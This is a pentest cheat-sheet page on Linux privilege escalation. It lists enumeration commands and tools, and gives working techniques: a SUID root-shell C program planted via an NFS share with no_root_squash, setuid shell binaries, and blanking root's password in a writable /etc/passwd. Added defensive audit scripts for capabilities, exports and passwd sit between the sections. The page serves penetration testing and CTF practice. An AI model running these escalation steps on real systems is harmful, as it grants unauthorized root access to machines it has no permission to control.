d4Rk's 1337 h4x0r guide
Privilege escalation > Linux

Overview

Last updated 3 years ago

Guides

GTFOBins

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Automated

LinPEAS

Linux Privilege Escalation Awesome Script

LinEnum

Scripted Local Linux Enumeration & Privilege Escalation Checks

Linux Smart Enumeration (LSE)

Linux enumeration tool for pentesting and CTFs with verbosity levels

Linux Exploit Suggester (LES)

linuxprivchecker.py

Unix-privesc-check

Manual

Kernel exploits

Get the kernel version, e.g. Linux kali 5.14.0-kali2-arm64 #1 SMP Debian 5.14.9-2kali1 (2021-10-04) aarch64 GNU/Linux

uname -a

Get the "marketing" name of the distribution, e.g. Ubuntu 20.04.1 LTS

cat /etc/issue

Get build details such as the compiler the kernel was built with, e.g. Linux version 5.14.0-kali2-arm64 (devel@kali.org) (gcc-10 (Debian 10.3.0-11) 10.3.0, GNU ld (GNU Binutils for Debian) 2.37) #1 SMP Debian 5.14.9-2kali1 (2021-10-04)

cat /proc/version

Manual information gathering

Operating system

uname -a
cat /etc/issue
cat /proc/version
cat /etc/*-release

Users

Info about current user

id

Check for other users (non-service users normally start at uid 1000)

cat /etc/passwd

Filter users with a login shell

grep -vE "nologin|false" /etc/passwd

Groups

Interesting unix groups

  • 44(video) <- has access to video output devices (odd, but occasionally useful)
  • 6(disk) <- has raw access to the block devices and hence the whole file system; read the disk using e.g. debugfs

Sudo

Check current privilege status

sudo -l

Todo: LD_PRELOAD https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/

SUID

Find files that have the SUID or SGID bit set

find / -type f \( -perm -4000 -o -perm -2000 \) -ls 2>/dev/null

Capabilities

List enabled capabilities

getcap -r / 2>/dev/null
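Added example (not part of the original page): a small triage filter for the `getcap -r /` output above. It reads getcap lines on stdin and reports only binaries carrying a capability that is commonly enough to reach root; the RISKY_CAPS shortlist and the `scan` argument are my own choices, not from the page.

```shell
#!/bin/sh
# Added example: triage "getcap -r /" output. Prints "<path> TAB <capability>"
# for every capability on the RISKY_CAPS shortlist (an assumed selection of
# capabilities that commonly allow local privilege escalation, not a full policy).
# Handles both output formats libcap has used over the years:
#   /usr/bin/ping = cap_net_raw+ep      (older libcap)
#   /usr/bin/ping cap_net_raw=ep        (libcap 2.41 and later)
RISKY_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner"

audit_caps() {
    while IFS= read -r line; do
        case $line in ''|'#'*) continue;; esac
        path=${line%% *}                 # first field is the path (paths with spaces unsupported)
        rest=${line#"$path"}
        rest=${rest# = }                 # old format separator
        rest=${rest# }                   # new format separator
        caps=${rest%%[=+]*}              # comma-separated cap list, flags (+ep / =ep) dropped
        oldifs=$IFS; IFS=','; set -- $caps; IFS=$oldifs
        for cap in "$@"; do
            case " $RISKY_CAPS " in
                *" $cap "*) printf '%s\t%s\n' "$path" "$cap";;
            esac
        done
    done
}

# Audit the live system when invoked with "scan"; otherwise only define the function
if [ "${1-}" = scan ]; then
    getcap -r / 2>/dev/null | audit_caps
fi
```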

Cron Jobs

cat /etc/crontab

NFS

Check for the no_root_squash option in the exports file

cat /etc/exports

Mount share

mkdir /tmp/share
mount -o rw <ip>:/share /tmp/share
cd /tmp/share

Create a SUID binary (binary.c)

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}

Compile it and set the SUID bit

gcc binary.c -o binary -w
chmod +s binary

Run it on target

./binary
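Added example (not part of the original page): an audit of the exports file the NFS steps above depend on. It reads exports(5)-style lines on stdin and reports entries with no_root_squash (remote root keeps uid 0 on the share, which is what the SUID-binary trick relies on) and wildcard clients; the output format and the `scan` argument are my own assumptions.

```shell
#!/bin/sh
# Added example: flag risky /etc/exports entries.
# Prints one finding per line as "<export path> TAB <client> TAB <finding>".
audit_exports() {
    set -f                                   # no globbing: '*' is a literal client spec
    while IFS= read -r line; do
        line=${line%%#*}                     # drop comments
        set -- $line                         # $1 = export path, $2.. = client(options) entries
        [ $# -ge 1 ] || continue
        path=$1
        shift
        for client in "$@"; do
            host=${client%%\(*}              # text before '(' is the client spec
            [ -n "$host" ] || host='*'       # "(opts)" with no host applies to everyone
            opts=${client#*\(}
            opts=${opts%\)}
            if [ "$opts" = "$client" ]; then # no '(' at all: no options given
                opts=''
            fi
            case $host in
                *'*'*) printf '%s\t%s\twildcard client\n' "$path" "$host";;
            esac
            case ",$opts," in
                *,no_root_squash,*) printf '%s\t%s\tno_root_squash\n' "$path" "$host";;
            esac
        done
    done
    set +f
}

# Audit the live system when invoked with "scan"; otherwise only define the function
if [ "${1-}" = scan ]; then
    audit_exports < /etc/exports
fi
```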

Running processes

ps aux

-> Is there anything unusual running, maybe related to the users found?

Network

netstat -antup

-> Is any service running that we missed in the port scan (firewall?)

Packages

Debian

dpkg -l

CentOS, OpenSuse, Fedora, RHEL

rpm -qa

OpenBSD, FreeBSD

pkg_info

Check for manually installed stuff

/var/
/opt/
/usr/local
/usr/local/bin
/usr/local/src
/usr/src
/home/<username>

Weak services

Look for files that run with root privileges but are writable by everyone -> replace the file with an exploit

Check tools potentially vulnerable to priv esc

which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null

setuid

Check the mount options of the available file systems -> the one used must not be mounted with nosuid

mount | grep -vE "nosuid"

setuid.c

#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}

Alternative setuid.c

#include <unistd.h>

int main(int argc, char *argv[]) {
    /* argv passed to execve must contain at least argv[0] and a terminating NULL */
    char *sh_argv[] = { "/bin/sh", NULL };
    setreuid(0, 0);
    execve("/bin/sh", sh_argv, NULL);
    return 1;
}

TODO: This doesn't seem to be working... Did it ever? Where did I get this from? PWK? 😬

gcc setuid.c -o /tmp/setuid
sudo chown root:root /tmp/setuid; sudo chmod 4755 /tmp/setuid

Writable /etc/passwd

Change the root entry and remove the x (the password flag), so no password is asked:

root:x:0:0:root:/root:/bin/bash -> root::0:0:root:/root:/bin/bash

su -> root
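Added example (not part of the original page): an audit of a passwd file for exactly the conditions this section abuses. It reports whether the file is writable (by the invoking user or by everyone), entries whose password field is empty, extra uid 0 accounts, and hashes kept in passwd rather than shadow; the message strings and the `scan` argument are my own assumptions.

```shell
#!/bin/sh
# Added example: audit a passwd file. Prints "<subject> TAB <finding>".
audit_passwd() {
    f=$1
    if [ -w "$f" ]; then
        printf '%s\twritable by current user\n' "$f"
    fi
    case $(ls -ld "$f") in            # 9th char of the mode string is the "other" write bit
        ????????w*) printf '%s\tworld-writable\n' "$f";;
    esac
    while IFS=: read -r user pw uid gid gecos home shell; do
        [ -n "$user" ] || continue
        if [ -z "$pw" ]; then
            printf '%s\tempty password field (no password needed)\n' "$user"
        else
            case $pw in
                x|'*'|'!'*) ;;        # shadowed or locked: fine
                *) printf '%s\tpassword hash stored in passwd, not shadow\n' "$user";;
            esac
        fi
        if [ "$uid" = 0 ] && [ "$user" != root ]; then
            printf '%s\tuid 0 (root-equivalent account)\n' "$user"
        fi
    done < "$f"
    return 0
}

# Audit the live system when invoked with "scan"; otherwise only define the function
if [ "${1-}" = scan ]; then
    audit_passwd /etc/passwd
fi
```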

Public exploits

-> Use searchsploit (exploit-db.com), Google, GitHub, etc. to check for publicly available kernel exploits.

Dirty COW

Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel.

Rational Love

glibc - 'getcwd()' Local Privilege Escalation 2018 local root exploit (CVE-2018-1000001).

Descriptions of the remaining tools listed under Automated above:

Linux Exploit Suggester (LES): Linux privilege escalation auditing tool

linuxprivchecker.py: A Linux Privilege Escalation Check Script

Unix-privesc-check: Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).

See also:

Basic Linux Privilege Escalation - g0tmi1k
PayloadsAllTheThings/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
GTFOBins
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng · GitHub
GitHub - rebootuser/LinEnum
GitHub - diego-treitos/linux-smart-enumeration
GitHub - mzet-/linux-exploit-suggester
GitHub - sleventyeleven/linuxprivchecker
unix-privesc-check | Kali Linux Tools
exploit-db.com
linux - Privilege escalation using passwd file - Information Security Stack Exchange
Dirty COW (CVE-2016-5195)
local-root-exploits/linux/CVE-2018-1000001 at master · 5H311-1NJ3C706/local-root-exploits · GitHub
PSPY